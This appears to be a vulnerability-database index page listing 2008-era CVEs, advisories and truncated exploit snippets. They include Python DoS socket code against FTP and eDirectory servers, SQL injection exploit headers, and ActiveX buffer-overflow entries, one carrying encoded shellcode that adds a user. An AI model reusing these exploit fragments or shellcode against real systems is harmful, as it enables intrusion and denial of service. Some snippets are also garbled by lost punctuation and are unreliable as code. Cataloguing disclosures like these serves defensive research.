Design/Logic Flaw

The NeffyLauncher 1.0.5 ActiveX control NeffyLauncher.dll in CDNetworks Nefficient Download uses weak cryptography for a KeyCode that blocks unauthorized use of the control, which allows remote attackers to bypass this protection mechanism by calculating the required KeyCode. NOTE: this can be us...

CVE-2008-1886

The NeffyLauncher 1.0.5 ActiveX control NeffyLauncher.dll in CDNetworks Nefficient Download uses weak cryptography for a KeyCode that blocks unauthorized use of the control, which allows remote attackers to bypass this protection mechanism by calculating the required KeyCode. NOTE: this can be us...

Microsoft Works 7 'WkImgSrv.dll' ActiveX Control Remote Code Execution Vulnerability

Description Microsoft Works 7 'WkImgSrv.dll' ActiveX control is prone to a remote code-execution vulnerability because it fails to sufficiently verify user-supplied input. An attacker can exploit this issue to run arbitrary attacker-supplied code in the context of the currently logged-in user...

xmeasy-port-dos.txt

!/usr/bin/python XM Easy Personal FTP Server 5.4.0 PORT DoS 1 byte DoS! Elhamdulillahi Rabbil-alemin! EAX BAADF00D - bad food? : ECX BAADF00D bt ./sploit.py + Saljemo zli bafer : + Booooooooom!!!! + Finito! bt I wasn't smoking crack, ryujin gave me the red pill! : Vulnerability discovered and cod...

sabros.us 1.75 (thumbnails.php) Remote File Disclosure Vulnerability

No description provided by source. Remote File Disclosure Vulnerability sabrosus 1.75 thumbnails.php AUTHOR : HaCkeREgY My HoMe : www.PaL-HaCker.com ConTacT : [email protected] Download Script :...

Novel eDirectory HTTP - Denial of Service

!/usr/bin/python Novel eDirectory HTTP DOS Discovered and coded by Mati Aharoni muts..at..offensive-security.com http://www.offensive-security.com/0day/novel-edir.py.txt import socket import os import sys from time import sleep biff=""2048 print " Payload sent "+ strlenbuff expl = socket.socket...

RunCMS Module bamagalerie3 Remote SQL Injection Vulnerability

No description provided by source. RUNCMS 1.1A : bamagalerie3 Module Remote SQL Injection's cid Script Page : http://runcms.org/ ---------------------------------------------------------- AUTHOR : DreamTurk Exploit coded and founded by DreamTurk : [email protected]...

CA Multiple Products DSM ListCtrl ActiveX Control Buffer Overflow Vulnerability

Title: CA Multiple Products DSM ListCtrl ActiveX Control Buffer Overflow Vulnerability CVE: CVE-2008-1472 CA Advisory Date: 2008-03-28 Reported By: Exploit code posted at milw0rm.com Impact: A remote attacker can cause a denial of service or execute arbitrary code. Summary: CA products that...

destar 0.2.2-5 Arbitrary Add New User Exploit

Exploit for unknown platform in category web applications ============================================= destar 0.2.2-5 Arbitrary Add New User Exploit ============================================= !/usr/bin/python Exploit for destar 0.2.2-5, tested on Linux Debian Bug found and exploit coded by a...

PHP-Nuke KutubiSitte Module - 'kid' SQL Injection

source: https://www.securityfocus.com/bid/28126/info The KutubiSitte module for PHP-Nuke is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the...

Buffer overflow

Buffer overflow in demuxers/demuxasf.c aka the ASF demuxer in the xineplugdmxasf.so plugin in xine-lib before 1.1.10 allows remote attackers to execute arbitrary code or cause a denial of service crash via a crafted ASF header. NOTE: this issue leads to a crash when an attack uses the CVE-2006-16...

CVE-2008-1110

Buffer overflow in demuxers/demuxasf.c aka the ASF demuxer in the xineplugdmxasf.so plugin in xine-lib before 1.1.10 allows remote attackers to execute arbitrary code or cause a denial of service crash via a crafted ASF header. NOTE: this issue leads to a crash when an attack uses the CVE-2006-16...

Simple CMS <= 1.0.3 (indexen.php area) Remote SQL Injection Exploit

No description provided by source. !/usr/bin/perl Simple CMS = 1.0.3 ?area= Remote SQL Injection Exploit Code by JosS Contact: sys-projectathotmail.com Spanish Hackers Team / Sys - Project http://www.spanish-hackers.com special thanks to ka0x print " "; print " Simple CMS = 1.0.3 Remote SQL...

Opium OPI Server and CyanPrintIP - Format String / Denial of Service

source: https://www.securityfocus.com/bid/27734/info Opium OPI Server and CyanPrintIP are prone to a denial-of-service vulnerability and a format-string vulnerability. An attacker can exploit these issues to execute arbitrary code within the context of the affected application or crash the...

MoinMoin 1.5.x MOIND_ID cookie Bug Remote Exploit

No description provided by source. !/usr/bin/python Exploit for the MOINDID cookie Bug MoinMoin 1.5.x Find your patch in : http://hg.moinmo.in/moin/1.5/rev/e69a16b6e630 Bug and exploit coded by just a nonroot and colombian user Enero 21 de 2008 Greets: el directorio and all the SL community impor...

Toshiba Surveillance - MeIpCamX.dll 1.0.0.4 Remote Buffer Overflow

Toshiba Surveillance - MeIpCamX.dll 1.0.0.4 Remote Buffer Overflow ///add su one, user: sun pass: tzu shellcode = unescape"%u03eb%ueb59%ue805%ufff8%uffff%u4949%u3749%u4949" + "%u4949%u4949%u4949%u4949%u4949%u4949%u5a51%u456a" + "%u5058%u4230%u4231%u6b41%u4141%u3255%u4241%u3241" +...

Microsoft Visual Basic Enterprise 6 SP6 - .dsr File Handling Buffer Overflow

Microsoft Visual Basic Enterprise 6 SP6 - .dsr File Handling Buffer Overflow usage: exploit.py import time print "---------------------------------------------------------------------------" print ' MS Visual Basic Enterprise Ed. 6 SP6 ".dsr" File Handling Buffer Overflow\n' print " author:...

Debian Security Advisory DSA 184-1 (krb4)

The remote host is missing an update to krb4 announced via advisory DSA 184-1. SPDX-FileCopyrightText: 2008 E-Soft Inc. Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription...

joomlapuarcade-sql.txt

Joomla Component PU Arcade Remote SQL Injection Exploit AUTHOR : HouSSamix of H-T TeaM We are HouSSamix ToXiC350 CoNaN HOME : http://no-hack.net Script : PU Arcade Joomla Component Tested in version 2.0.3 & 2.1.3 Beta Download : http://www.pragmaticutopia.com/ DorKs : PU Arcade by...

Microsoft Windows Message Queuing Service - RPC Buffer Overflow (MS07-065) (1)

/ Windows Message Queuing Service Remote RPC BOF Exploit MS07-065 by axis http://www.ph4nt0m.org you should know the dnsname of target to trigger this vuln the service runs on port 2103/2105/2107 D:\soft\develop\MyProjects\temp\Debugtemp.exe -h 192.168.152.100 -p 2103...